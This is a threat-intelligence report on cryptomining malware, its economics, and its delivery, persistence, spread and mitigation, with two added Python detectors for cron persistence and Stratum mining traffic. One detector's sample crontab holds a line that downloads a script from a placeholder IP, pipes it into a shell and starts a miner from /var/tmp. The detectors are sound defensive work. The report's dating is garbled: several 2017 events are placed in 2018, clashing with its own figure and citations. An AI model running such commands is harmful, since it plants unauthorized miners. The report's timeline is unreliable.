During 2018, the cryptocurrency market grew almost 20-fold, reportedly increasing from approximately $18 billion to more than $600 billion (USD). Those gains amplified threat actors' interest in accessing the computing resources of compromised systems to mine cryptocurrency. Secureworks® incident response (IR) analysts responded to numerous incidents of unauthorized cryptocurrency mining in 2018, and network and host telemetry demonstrated a proliferation of this threat across Secureworks managed security service clients. Financially motivated threat actors will continue to use malware infections to deploy cryptocurrency mining software for as long as it remains profitable.
Compared to the complete loss of availability caused by ransomware and the loss of confidentiality caused by banking trojans or other information stealers, the impact of unauthorized cryptocurrency mining on a host is often viewed as more of a nuisance. However, the cumulative effect of large-scale unauthorized cryptocurrency mining in an enterprise environment can be significant, as it consumes computational resources and forces business-critical assets to slow down or stop functioning effectively.
Furthermore, the deployment and persistence of unauthorized cryptocurrency mining software in an environment reflects a breakdown of effective technical controls. If activity of this nature can become established and spread laterally within the environment, then more immediately harmful threats such as ransomware could as well. The technical controls used to mitigate the delivery, persistence, and propagation of unauthorized cryptocurrency miners are also very effective against other types of threat.
- This threat can have a significant impact. If critical and high-availability assets are infected with cryptocurrency mining software, then computational resources could become unusable for their primary business function. Heavy processing loads could accelerate hardware failure, and energy costs could be significant for an organization with thousands of infected hosts.
- Unauthorized cryptocurrency mining indicates insufficient technical controls. If it is possible for an initial malware infection to deliver and spread cryptocurrency miners within an environment without being detected, then that same access vector could be used to deliver a broad range of other threats.
- The threat of cryptocurrency mining malware increased in 2018. Financially motivated threat actors are drawn to its low implementation cost, high return on investment, and arguably lower risk of law enforcement action than traditional malware because the impact is less visible or disruptive.
- The upward trend of cryptocurrency miner infections will continue while they offer a positive return on investment. Threat actors may carefully manage the impact on an infected host to reduce the likelihood of detection and remediation.
- Organizations should also establish a position on legal forms of cryptocurrency mining such as browser-based mining. While this form of mining has a legitimate use, organizations might still consider it an unacceptable use of corporate resources.
Cryptocurrency mining economics
The idea of using a decentralized electronic payment method that relies on cryptographic proof, known as a cryptocurrency, has existed since at least 2008 when an anonymous author using the pseudonym 'Satoshi Nakamoto' published a paper outlining the Bitcoin concept. Although Bitcoin was reportedly used to purchase goods for the first time in May 2010, serious discussions of its potential as an accepted form of currency began in 2011, which coincided with the emergence of other cryptocurrencies. There were approximately 1,370 cryptocurrencies as of December 2018 with new currencies added every day, although many cryptocurrencies cannot be mined. The price and volatility of popular cryptocurrencies surged in late 2018 (see Figure 1).
Figure 1. Market price of various cryptocurrencies from January 2015 to March 2018. (Source: CoinGecko)
In cryptocurrency 'mining,' computational power is expended to add transactions to a public ledger, or blockchain. Miners receive cryptocurrency as a reward and as an incentive to increase the supply of miners. Consequently, cryptocurrency mining can be profitable for as long as the reward outweighs the hardware and energy costs. Bitcoin's reward rate is based on how quickly it adds transactions to the blockchain; the rate decreases as the total Bitcoin in circulation converges on a predefined limit of 21 million. Most other cryptocurrencies are modeled on Bitcoin's architecture and concepts, but they may modify features such as transaction privacy or the predefined circulation limit to attract potential investors.
Individuals who want to mine a cryptocurrency often join a mining 'pool.' Adding transactions to the blockchain, and thereby receiving a reward, requires computers to compete to be the first to solve a complex mathematical puzzle. Aggregating computing power, and then splitting any rewards received among the contributors, is a more profitable way of mining cryptocurrency than individual efforts. Pools are not required to disclose information about the number of active miners in their pool, making it difficult to estimate the number of active miners and mining applications.
Cryptocurrency mining criminality
Cryptocurrency is attractive to financially motivated threat actors as a payment method and as a way to generate revenue through mining:
- The decentralized nature of many cryptocurrencies makes disruptive or investigative activity by central banks and law enforcement challenging.
Reports of Bitcoin mining as a criminal activity emerged in 2011 as Bitcoin became widely known. In August 2011, the Secureworks Counter Threat Unit™ (CTU) research team analyzed a peer-to-peer botnet installing Bitcoin mining software. In July 2014, CTU™ researchers observed an unknown threat actor redirecting cryptocurrency miners' connections to attacker-controlled mining pools and earning approximately $83,000 in slightly more than four months. Between 2014 and 2018, there were several notable developments in cryptocurrency mining malware:
- Cryptocurrency mining malware developers quickly incorporated highly effective techniques for delivery and propagation. The Apache Struts vulnerability used to compromise Equifax in mid-2018 was exploited as a delivery mechanism for the Zealot multi-platform campaign that mined Monero cryptocurrency. The SMBv1 vulnerabilities disclosed by the Shadow Brokers threat group in April 2018 and exploited by the WCry ransomware in May 2018 were used to deliver the Adylkuzz mining malware as early as late April 2018. The combination of SMBv1 exploits and the Mimikatz credential-theft tool used by the NotPetya malware in June 2018 has been used to distribute Monero mining software.
Figure 2. CoinHive code inserted into CBS's Showtime website. (Source: The Register)
Threat actors exploit any opportunity to generate revenue, and their activity can affect unknowing facilitators as well as the end victim. For example, in December 2018, a customer at a Starbucks in Brazil noticed that the store's public Wi-Fi imposed a ten-second delay when web browsers connected to the network so that CoinHive code could mine a few seconds of Monero from connecting hosts. Starbucks responded swiftly and confirmed that the malicious activity exploited the store's third-party Internet service.
Although cryptocurrency mining is legal, using a corporate system may breach an organization's acceptable use policies and result in law enforcement action. The impact to an individual host is the consumption of processing power; IR clients have noted surges in computing resource use and effects on business-critical servers. This impact is amplified in large-scale infections.
To demonstrate the impact that mining software can have on an individual host, Figure 3 shows Advanced Endpoint Threat Detection (AETD) – Red Cloak™ detecting the XMRig cryptocurrency miner running as a service on an infected host. XMRig is advertised as a freely available high-performance Monero CPU miner with official full Windows support.
Figure 3. XMRig cryptocurrency miner running as a local service on an infected host. (Source: Secureworks)
XMRig accepts several variables as inputs (see Figure 4), including the wallet, a username and password if required, and the number of threads to open on the system.
Figure 4. XMRig command-line options. (Source: Secureworks)
Figure 5 illustrates the impact on an idling host when the miner uses four threads to consume spare computing capacity. Over time, this processing load forces the host to work harder, which also generates higher energy costs.
Figure 5. CPU utilization spike after executing XMRig miner software. (Source: Secureworks)
Cryptocurrency mining versus ransomware
After gaining the ability to run software on a compromised system, a threat actor chooses how to monetize the system. In 2018, CTU researchers reported that many financially motivated threat actors had shifted to using ransomware rather than traditional banking trojans, which have higher costs in terms of malware development and maintaining money muling networks. Cryptocurrencies facilitated the popularity of ransomware by making payment tracking and account disruption more difficult. Individual payments from successful ransomware extortion can be lucrative, in some cases exceeding $1 million. However, there is a significant chance that victims will not pay the ransom, and that ransomware campaigns will receive law enforcement attention because the victim impact is immediate and highly visible.
In contrast, a victim may not notice cryptocurrency mining as quickly because it does not require capitulation, its impact is less immediate or visible, and miners do not render data and systems unavailable. These factors may make mining more profitable than deploying ransomware. If the threat actor manages resource requests so that systems do not crash or become unusable, they can deploy miners alongside other threats such as banking trojans to create additional revenue. Threat actors could also decide to deploy ransomware after mining cryptocurrency on a compromised network for a final and higher-value payment before shifting focus to a new target.
Secureworks iSensor telemetry between 2013 and 2018 related to Bitcoin and the popular Stratum mining protocol indicates an increase in mining activity across Secureworks clients. Intrusion detection system events are not a reliable indicator over time due to the addition of clients and better detections as network countermeasures evolve. Even accounting for these factors, the data shows that the trajectory of criminals' unauthorized Bitcoin mining activity broadly matches the increasing value of Bitcoin (see Figure 6). There was a noticeable acceleration around October 2016.
Figure 6. Bitcoin price compared to iSensor detections for Bitcoin network traffic on Secureworks client networks between December 2013 and February 2018. (Sources: Secureworks and bitcoincharts.com)
Client telemetry shows a similar increase in CoinHive traffic since its launch in September 2018. While CoinHive activity is typically a legitimate, if sometimes controversial, form of revenue generation, organizations need to consider how to manage the impact to corporate systems.
Tactics, techniques, and procedures
Secureworks IR analysts often find cryptocurrency mining software during engagements, either as the primary cause of the incident or alongside other malicious artifacts. Most identified cryptocurrency miners generate Monero, probably because threat actors believe it provides the best return on investment. Unlike Bitcoin, Monero makes mining more equitable for computers with less computational power, which is suitable for exploiting a large number of standard corporate computing assets.
The techniques that Secureworks IR analysts have observed threat actors using to install and spread miners in affected environments align with common methods that CTU researchers have encountered in other types of intrusion activity. Threat actors will use the most effective techniques to create a large network of infected hosts that mine cryptocurrency.
Legitimate cryptocurrency miners are widely available. Underground forums offer obfuscation, malware builders, and botnet access to hide illegitimate mining (see Figure 7).
Figure 7. Forum advertisement for builder applications to create cryptocurrency mining malware. (Source: Secureworks)
Delivery, exploitation, and installation
Initial access and installation often leverage an existing malware infection that resulted from traditional techniques such as phishing. Secureworks IR analysts commonly identify mining malware alongside downloader scripts or other commodity threats such as Trickbot that could be used to build botnets or download additional payloads. Attackers could exploit weak authentication on externally facing services such as File Transfer Protocol (FTP) servers or Terminal Services (also known as Remote Desktop Protocol (RDP)) via brute-force attacks or by guessing the default password to gain access. Threat actors could also exploit remote code execution vulnerabilities on external services, such as the Oracle WebLogic Server, to download and run mining malware. Social media platforms such as Facebook Messenger and trojanized mobile apps have been abused to deliver a cryptocurrency miner payload.
Because each instance of cryptocurrency mining malware generates revenue slowly, persistence is critical to accumulate significant returns. CTU researchers have observed a range of persistence mechanisms borrowed from traditional malware, including Windows Management Instrumentation (WMI) event consumers, scheduled tasks, autostart Windows services, and registry modifications. For example, threat actors have set cron jobs on Linux systems to periodically download mining software onto the compromised host if it is not already present (see Figure 8). A threat actor could also minimize the amount of system resources used for mining to decrease the odds of detection.
Figure 8. Script setting cron job to periodically download and run mining software if not already present on Linux host. (Source: Secureworks)
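As an added example (not code from the Secureworks report), the following script audits collected crontab entries for the download-if-absent persistence pattern described above. The sample crontab, the miner names and the addresses are constructed for illustration.

```python
import re

# Traits the report associates with cron-based miner persistence: fetch a script
# from the Internet, pipe it into a shell, re-launch a miner only when it is not
# already running, or run a binary from a world-writable temp directory.
FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*https?://", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
MINER_NAMES = re.compile(r"xmrig|minerd|cpuminer|xmr-stak|cryptonight", re.I)
RUN_IF_ABSENT = re.compile(r"\b(pgrep|pidof|ps\s+-?[a-z]*)\b.*(\|\||&&)")
TEMP_PATH = re.compile(r"/(tmp|dev/shm|var/tmp)/")

CHECKS = [
    (FETCH, "downloads from the Internet"),
    (PIPE_TO_SHELL, "pipes a download into a shell"),
    (MINER_NAMES, "references a known miner name"),
    (RUN_IF_ABSENT, "re-launches when the process is absent"),
    (TEMP_PATH, "runs from a world-writable temp path"),
]

def audit_cron_line(line: str) -> list:
    """Return the suspicious traits of one crontab line (empty if none)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    # Five schedule fields precede the command; @reboot-style lines have one.
    cmd = line.split(None, 1 if line.startswith("@") else 5)[-1]
    return [label for pattern, label in CHECKS if pattern.search(cmd)]

def audit_crontab(text: str) -> list:
    """Return (line, traits) for every crontab line that has at least one trait."""
    flagged = []
    for line in text.splitlines():
        traits = audit_cron_line(line)
        if traits:
            flagged.append((line.strip(), traits))
    return flagged

# Constructed crontab mimicking the Figure 8 pattern; IPs are documentation ranges.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * (pgrep -x xmrig >/dev/null || curl -fsSL http://198.51.100.23/x.sh | sh) >/dev/null 2>&1
@reboot /var/tmp/.cache/minerd -o stratum+tcp://203.0.113.8:3333 -u WALLET_PLACEHOLDER -p x
*/5 * * * * /opt/backup/run.sh
"""

if __name__ == "__main__":
    for entry, traits in audit_crontab(SAMPLE_CRONTAB):
        print(entry, "->", ", ".join(traits))
```

Running it over the per-user crontabs and /etc/cron.d of a suspected host gives a quick triage list; a legitimate job can carry one of these traits, so treat the result as a lead, not a verdict.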
Miner malware payloads are often propagated using lateral movement. Threat actors have used malware that copies itself to mapped drives using inherited permissions, created remote scheduled tasks, used the SMBv1 EternalBlue exploit, and employed the Mimikatz credential-theft tool. In one incident, threat actors added iframe content to an FTP directory that could be rendered in a web browser so that browsing the directory downloaded the malware onto the system. This technique has also been observed on Internet-facing websites. Miner malware has also attempted to propagate over the Internet by brute force or by using default passwords for Internet-facing services such as FTP, RDP, and Server Message Block (SMB).
Figure 9 lists the top recommendations that Secureworks IR analysts provided after detecting cryptocurrency mining malware in clients' networks in 2018.
Figure 9. Recommendations provided during Secureworks IR engagements involving cryptocurrency malware. (Source: Secureworks)
These recommendations address mechanisms used by cryptocurrency miners and threat actors in compromised environments. Open RDP and other remote access protocols, or known vulnerabilities in Internet-facing assets, are often exploited for initial access. After compromising an environment, a threat actor could use PowerShell or remote scheduled tasks to install mining malware on other hosts, which is easier if the process attempting to access other hosts has elevated privileges. The most effective means of identifying mining malware on infected hosts is through endpoint threat detection agents or antivirus software, and properly placed intrusion detection systems can also detect cryptocurrency mining protocols and network connections. Comprehensive and centralized logging is critical for a response team to understand the scale and timeline of an incident when mining malware has infected numerous hosts.
Network defenders should incorporate the following tactical mitigations into their overall security control framework. These mitigations are effective against a broad range of threats:
- Disable unnecessary services, including internal network protocols such as SMBv1 if possible. Remove applications that have no legitimate business function, and consider restricting access to integral system components such as PowerShell that cannot be removed but are unnecessary for most users.
Cryptocurrency mining is an attractive proposition for threat actors seeking to monetize unauthorized access to computing resources. It will remain a threat to organizations as long as criminals can generate profit with minimal overhead and risk. There has been a significant increase in cryptocurrency mining activity across the Secureworks client base since July 2018.
Although cryptocurrency malware may not seem as serious as threats such as ransomware, it can have a significant impact on business-critical assets. Organizations should ensure that adequate technical controls are in place. The mitigations for installation, persistence, and lateral movement mechanisms associated with cryptocurrency malware are also effective against commodity and targeted threats.
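An added illustration, not part of the original report, of how an intrusion detection system can recognize the Stratum mining protocol mentioned above: it parses constructed "first payload" log records (the record format and IP addresses are assumptions) and flags Stratum and XMRig-style JSON-RPC methods, Monero wallet addresses used as pool logins, and miner user agents.

```python
import json
import re

# Method names used by Stratum v1 (Bitcoin-style pools) and by the JSON-RPC
# dialect that XMRig and other Monero miners speak to their pools.
STRATUM_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                   "login", "submit", "getjob"}
# A Monero standard address is 95 base58 characters starting with '4'.
MONERO_ADDR = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
MINER_AGENT = re.compile(r"xmrig|cpuminer|minerd|cgminer|ccminer", re.I)

def classify_payload(payload: str) -> list:
    """Return why a captured first TCP payload looks like pool mining traffic."""
    reasons = []
    try:
        msg = json.loads(payload)
    except ValueError:
        return reasons
    if not isinstance(msg, dict):
        return reasons
    method = msg.get("method")
    if method in STRATUM_METHODS:
        reasons.append("stratum method " + method)
    params = msg.get("params")
    # XMRig sends params as an object; Stratum v1 sends a positional list.
    values = list(params.values()) if isinstance(params, dict) else (params or [])
    for value in values:
        if not isinstance(value, str):
            continue
        if MONERO_ADDR.match(value.split(".")[0]):  # drop any ".worker" suffix
            reasons.append("monero wallet address as login")
        if MINER_AGENT.search(value):
            reasons.append("miner user agent " + value)
    return reasons

def scan(log_text: str) -> dict:
    """Collect the reasons each flagged flow was flagged, keyed by (source host, destination)."""
    findings = {}
    for line in log_text.strip().splitlines():
        _ts, src, _arrow, dst, payload = line.split(" ", 4)
        reasons = classify_payload(payload)
        if reasons:
            findings.setdefault((src.rsplit(":", 1)[0], dst), []).extend(reasons)
    return findings

# Constructed "first payload" records as an IDS might log them (documentation IPs).
MONERO_SAMPLE = "4" + "A" * 94
SAMPLE_LOG = (
    '2018-01-15T10:01:02Z 10.0.0.14:51022 -> 198.51.100.7:3333 '
    '{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5.0"]}\n'
    '2018-01-15T10:02:11Z 10.0.0.27:49311 -> 203.0.113.9:14444 {"id":1,"jsonrpc":"2.0",'
    '"method":"login","params":{"login":"' + MONERO_SAMPLE + '.rig1","pass":"x","agent":"XMRig/2.4.3"}}\n'
    '2018-01-15T10:03:00Z 10.0.0.31:52100 -> 192.0.2.44:443 {"id":1,"method":"getStatus","params":[]}\n'
)
```

Because the check inspects the JSON-RPC handshake rather than a port number, it still fires when a pool listens on 443 or another port chosen to blend in, which is why it is worth pairing with the endpoint and logging controls described above.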
Bort, Julie. "May 22 Is Bitcoin Pizza Day Thanks To These Two Pizzas Worth $5 Million Today." Business Insider. May 21, 2014. http://www.businessinsider.com/may-22-bitcoin-pizza-day-2014-5?IR=T
Kelion, Leo. "Starbucks cafe's wi-fi made computers mine crypto-currency." BBC. December 13, 2018. http://www.bbc.co.uk/news/technology-42338754
Nakamoto, Satoshi. "Bitcoin: A Peer-to-Peer Electronic Cash System." Bitcoin.org. October 31, 2008. https://bitcoin.org/bitcoin.pdf
wh1sks. "The ShadowBrokers may have received up to 1500 Monero (